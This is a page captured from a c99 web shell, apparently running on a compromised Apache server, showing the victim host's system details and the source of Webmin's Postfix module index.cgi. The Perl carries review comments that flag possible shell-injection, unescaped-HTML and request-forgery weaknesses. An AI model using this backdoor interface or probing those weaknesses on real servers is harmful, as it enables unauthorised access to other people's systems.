!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/postfix/   drwxr-xr-x
Free 49.59 GB of 127.8 GB (38.8%)


Viewing file:     index.cgi (4.35 KB)      -rwxr-xr-x
#!/usr/bin/perl
#
# postfix-module by Guillaume Cottenceau <gc@mandrakesoft.com>,
# for webmin by Jamie Cameron
#
# A word about this module.
#
# Postfix provides a command to control its parameters: `postconf'.
# That is the reason why I don't parse and set the values manually.
# Going through postconf is much better because it is resilient to
# changes in the Postfix config files.
#
# However, there is no way to `set back to default' an already
# changed parameter in the case of dynamic parameters.
# [example: for `static' parameters, which default to `0', I can
# set the parameter to `0' ; but for `dynamic' parameters such as
# domainname [which comes from a system call] I have no way]
# So for this special case, I parse the config file and manually
# delete the corresponding line.
#
# gc.
#


require './postfix-lib.pl';

# Detect the installed Postfix version by asking the configured postconf
# command for its mail_version parameter (stderr is folded into the output).
# NOTE(review): the command path comes from the module configuration and is
# interpolated into a shell command line; that is only acceptable while the
# setting can be changed by trusted administrators alone - confirm against
# the module's access control.
my $postconf_path = $config{'postfix_config_command'};
if (&has_command($postconf_path)) {
    my $postconf_out =
        &backquote_command("$postconf_path mail_version 2>&1", 1);
    if ($postconf_out =~ /mail_version\s*=\s*(.*)/) {
        # Got the version
        $postfix_version = $1;
        }
    }

# Page header. The version text is passed as the final argument only when a
# version was detected; otherwise undef is passed in its place.
&ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1, 0,
    &help_search_link("postfix", "man", "doc", "google"),
    undef, undef,
    $postfix_version ? &text('index_version', $postfix_version) : undef);

# Save the version for use by other CGIs. When detection failed the file
# ends up holding just a newline.
my $version_file = "$module_config_directory/version";
&open_tempfile(VERSION, ">$version_file", 0, 1);
&print_tempfile(VERSION, "$postfix_version\n");
&close_tempfile(VERSION);

# Verify, in order, the postfix control command, the postfix config command
# and the postsuper command. Each entry is: module config key, message key
# for the error text, and whether to offer a package install link.
# The first command that fails validation ends the page.
# NOTE(review): the configured path is placed between <tt> tags without HTML
# escaping. It is an administrator-set value, but escaping it (Webmin ships
# html_escape for this) would be the safer default - confirm before changing.
foreach my $cmd_check (
        [ 'postfix_control_command', 'index_epath',   1 ],
        [ 'postfix_config_command',  'index_econfig', 0 ],
        [ 'postfix_super_command',   'index_esuper',  0 ] ) {
    my ($cfg_key, $msg_key, $offer_install) = @$cmd_check;
    next if (&valid_postfix_command($config{$cfg_key}));

    print &text($msg_key,
        "<tt>$config{$cfg_key}</tt>",
        "../config.cgi?$module_name"),"<p>\n";

    if ($offer_install) {
        # Only the control command check offers to install the package
        &foreign_require("software", "software-lib.pl");
        $lnk = &software::missing_install_link(
                "postfix", $text{'index_postfix'},
                "../$module_name/", $text{'index_title'});
        if ($lnk) {
            print $lnk,"<p>\n";
            }
        }

    &ui_print_footer("/", $text{'index'});
    exit;
    }

# Verify that current configuration is valid. If not, only allow manual editing
# (and that link is shown only to users with the 'manual' access right).
# NOTE(review): $err is whatever check_postfix() returned and is written
# inside <pre> unescaped; if that text can contain markup taken from the
# configuration files it should be HTML-escaped first - verify what
# check_postfix() returns.
if ($config{'index_check'}) {
    $err = &check_postfix();
    if ($err) {
        print &text('check_error'),"<p>\n";
        print "<pre>$err</pre>\n";
        print "<a href=edit_manual.cgi>$text{'check_manual'}</a><p>\n"
            if ($access{'manual'});
        &ui_print_footer("/", $text{'index'});
        exit;
        }
    }

# Work out which optional pages apply to this Postfix version.
# "dependent" is listed for 3.x, or for 2.x with a minor version above 7.
my $show_dependent = $postfix_version =~ /^3\./ ||
                     $postfix_version =~ /^2\.(\d+)/ && $1 > 7;
# "ldap" is listed only when the version, compared as a number, is not
# greater than 2 (this includes the case where no version was detected).
my $show_ldap = !($postfix_version > 2);

# Candidate pages, in display order
@onames = (
    "general", "address_rewriting", "aliases", "canonical",
    "virtual", "transport", "relocated", "header", "body", "bcc",
    ( $show_dependent ? ( "dependent" ) : ( ) ),
    "local_delivery", "resource",
    "smtpd", "smtp", "sasl", "client",
    "rate", "debug",
    ( $show_ldap ? ( "ldap" ) : ( ) ),
    "master", "mailq", "postfinger", "boxes", "manual",
    );

# The mailboxes icon depends on access to the separate mailboxes module
$access{'boxes'} = &foreign_available("mailboxes");

# Build the link, title and icon lists, skipping any page this user's
# access settings do not allow.
foreach $oitem (@onames) {
    next if (!$access{$oitem});

    # "boxes" links to the other module; everything else is <name>.cgi
    my $page_link = $oitem eq "boxes" ? "../mailboxes/" : $oitem . ".cgi";

    my $page_title = $oitem eq 'manual' ? $text{'cmanual_title'}
                                        : $text{$oitem . "_title"};
    if ($oitem eq 'mailq' && !$config{'mailq_count'}) {
        # Count the queue and show the number under the icon title
        my @queued = &list_queue(0);
        $page_title .= "<br>".&text('mailq_count', scalar(@queued));
        }

    push(@olinks, $page_link);
    push(@otitles, $page_title);
    push(@oicons, "images/" . $oitem . ".gif");
    }

&icons_table(\@olinks, \@otitles, \@oicons);


# Start / stop button, shown only to users with the 'startstop' access right.
# NOTE(review): the <form> is opened inside the table cell but closed after
# </table>, so the markup is mis-nested. The form also names no method, so
# the browser submits it with GET; the state change in stop.cgi / start.cgi
# therefore depends on whatever request-origin checks the server applies -
# confirm those are enabled.
if ($access{'startstop'}) {
    print &ui_hr();

    # Pick the form, button and explanation that match the current state
    my @button_rows = &is_postfix_running()
        ? ( "<form action=stop.cgi>\n",
            "<input type=submit value=\"$text{'index_stop'}\">\n",
            "</td> <td>$text{'index_stopmsg'}\n" )
        : ( "<form action=start.cgi>\n",
            "<input type=submit value=\"$text{'index_start'}\">\n",
            "</td> <td>$text{'index_startmsg'}\n" );

    print "<table cellpadding=5 width=100%><tr><td>\n";
    foreach my $row (@button_rows) {
        print $row;
        }
    print "</td></tr></table></form>\n";
    }

&ui_print_footer("/", $text{'index'});





--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0474 ]--